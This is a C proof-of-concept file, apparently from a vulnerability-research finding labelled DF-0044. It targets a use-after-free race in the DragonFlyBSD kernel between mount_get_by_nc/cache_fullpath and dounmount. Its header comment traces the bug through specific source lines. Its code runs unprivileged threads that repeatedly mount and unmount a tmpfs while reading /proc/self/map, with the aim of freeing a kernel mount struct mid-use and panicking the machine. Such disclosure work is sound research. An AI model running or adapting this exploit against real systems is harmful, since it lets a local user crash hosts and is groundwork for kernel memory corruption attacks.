DF-0044 / mount_uaf.c
/*
 * DF-0044 PoC -- mount_get_by_nc unheld-return UAF via cache_fullpath
 * racing dounmount.
 *
 * CONFIRMED CODE-LEVEL BUG (master DEV, X86_64_GENERIC):
 *   - sys/kern/vfs_mount.c:1235-1248 mount_get_by_nc() returns mp
 *     WITHOUT calling mount_hold(mp). Token released at :1245, return
 *     at :1247 -- no hold taken. Contrast vfs_getvfs() at :413-424
 *     which does mount_hold(mp) at :420-421 (comment at :410-411
 *     documents the contract: "the returned mp is held and the caller
 *     is expected to drop it via mount_drop()"). mountlist_scan() at
 *     :756/:784 also mount_hold()s before dropping the token.
 *     mount_get_by_nc is the lone outlier and breaks the invariant.
 *   - sys/kern/vfs_cache.c:5214 sole caller cache_fullpath() takes the
 *     returned mp and at :5224 dereferences new_mp->mnt_ncmounton AFTER
 *     the mountlist_token has been released. It never mount_drop()s.
 *   - sys/kern/vfs_syscalls.c:1040,1066-1069,1108-1117 dounmount()
 *     removes mp from mountlist, zeroes mnt_ncmounton, waits for
 *     mnt_refs==0, then mount_drop(mp) -> kfree(mp, M_MOUNT) once
 *     mnt_hold hits 0. That kfree frees the very struct the unheld
 *     pointer in cache_fullpath still points at -> UAF.
 *
 * The ONLY caller of cache_fullpath(guess=1) is procfs_map.c:181
 * (vn_fullpath(p, vp, ..., 1) when reading /proc/$pid/map). So the
 * deref side must read /proc/$pid/map for a vnode whose path traverses
 * the cycled mountpoint.
 *
 * This PoC drives BOTH sides concurrently. The binary is placed INSIDE
 * the cycled mount, so its text vp is on the cycled mount. Reading
 * /proc/self/map then drives vn_fullpath(p, p_textvp, ..., 1) ->
 * cache_fullpath(guess=1) -> mount_get_by_nc. Meanwhile, N cyclers
 * mount+unmount the path to free struct mount through kfree.
 *
 * Build (DragonFlyBSD, as unpriv user): cc -pthread -O2 -o mount_uaf ...
 * Run   (place binary INSIDE the mountpoint; vfs.usermount=1;
 *        disposable VM): ./mount_uaf /tmp/df0044/m 60
 *
 * NOTE: this race is extremely tight on a non-INVARIANTS kernel.
 * The deref is a single memory read; the unmount's kfree is gated by
 * an mnt_refs drain that usually completes only after the deref.
 * A panic in _cache_hold on a bogus ncp, a slab-allocator complaint,
 * or a fatal trap in vfs_cache.c during the deref window is the
 * expected signature when the race is won. If the guest stays up,
 * the race was not won this run -- the code-level proof in
 * VERDICT.md stands regardless.
 */

#define _GNU_SOURCE

#include <sys/types.h>
#include <sys/mount.h>
#include <sys/stat.h>

#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* tmpfs mount-info struct (sys/vfs/tmpfs/tmpfs_mount.h).
 * We need to set ta_root_uid = getuid() so the mount is owned by us
 * and we can unmount it without MNT_FORCE (which is privileged).
 * Otherwise tmpfs_statfs overwrites mnt_stat.f_owner with tm_root->tn_uid
 * (default 0 = root), and sys_unmount then denies us with EPERM
 * (mnt_stat.f_owner != our uid && no priv).
*/ #define TMPFS_ARGS_VERSION 2 struct tmpfs_mount_info { int ta_version; long long ta_nodes_max; /* ino_t */ long long ta_size_max; /* off_t */ unsigned long long ta_maxfsize_max; /* size_t */ unsigned int ta_root_uid; /* uid_t */ unsigned int ta_root_gid; /* gid_t */ unsigned short ta_root_mode; /* mode_t */ }; static char mpoint[512]; static volatile int go = 1; static volatile unsigned long long iter_deref = 0; static volatile unsigned long long iter_free = 0; static volatile unsigned long long iter_free_fail = 0; /* Free side: cycle mount+umount of mpoint to recycle struct mount * through kfree. No MNT_FORCE needed (we own the mount). */ static void * mount_cycler(void *a) { (void)a; while (go) { struct tmpfs_mount_info mi; memset(&mi, 0, sizeof(mi)); mi.ta_version = TMPFS_ARGS_VERSION; mi.ta_root_uid = getuid(); mi.ta_root_gid = getgid(); mi.ta_root_mode = 0755; int mr = mount("tmpfs", mpoint, 0, &mi); if (mr != 0) { /* Maybe leftover from a peer thread -- try cleanup. */ iter_free_fail++; unmount(mpoint, 0); continue; } /* Plain unmount: nothing holds vnodes on the fresh tmpfs. */ int ur = unmount(mpoint, 0); if (ur == 0) iter_free++; else iter_free_fail++; } return NULL; } /* Deref side: read /proc/self/map. procfs_map.c:181 calls * vn_fullpath(p, vp, ..., 1) for each vnode-backed vmap. Our text vp * (this binary) lives inside mpoint, so its path traverses the cycled * mountpoint, exercising cache_fullpath(guess=1) -> mount_get_by_nc. 
*/ static void * map_reader(void *a) { (void)a; char buf[65536]; while (go) { int fd = open("/proc/self/map", O_RDONLY); if (fd < 0) { usleep(50); continue; } ssize_t n; while ((n = read(fd, buf, sizeof(buf))) > 0) { iter_deref++; } close(fd); } return NULL; } int main(int argc, char **argv) { if (argc > 1) snprintf(mpoint, sizeof(mpoint), "%s", argv[1]); else if (getcwd(mpoint, sizeof(mpoint)) == NULL) { perror("getcwd"); return 2; } unsigned int secs = 30; if (argc > 2) secs = (unsigned int)atoi(argv[2]); unsigned int nfree = 2; if (argc > 3) nfree = (unsigned int)atoi(argv[3]); fprintf(stderr, "DF-0044: cycling mount at %s (uid=%u gid=%u)\n", mpoint, getuid(), getgid()); fprintf(stderr, "DF-0044: %u cycler threads + 4 /proc/self/map readers\n", nfree); fprintf(stderr, "DF-0044: running %u seconds\n", secs); pthread_t tfree[16], tderef[4]; for (unsigned int i = 0; i < nfree && i < 16; i++) pthread_create(&tfree[i], NULL, mount_cycler, NULL); for (int i = 0; i < 4; i++) pthread_create(&tderef[i], NULL, map_reader, NULL); sleep(secs); go = 0; for (unsigned int i = 0; i < nfree && i < 16; i++) pthread_join(tfree[i], NULL); for (int i = 0; i < 4; i++) pthread_join(tderef[i], NULL); fprintf(stderr, "DF-0044: deref=%llu free_ok=%llu free_fail=%llu\n", iter_deref, iter_free, iter_free_fail); fprintf(stderr, "DF-0044: still alive -- race not won this run\n"); return 0; } |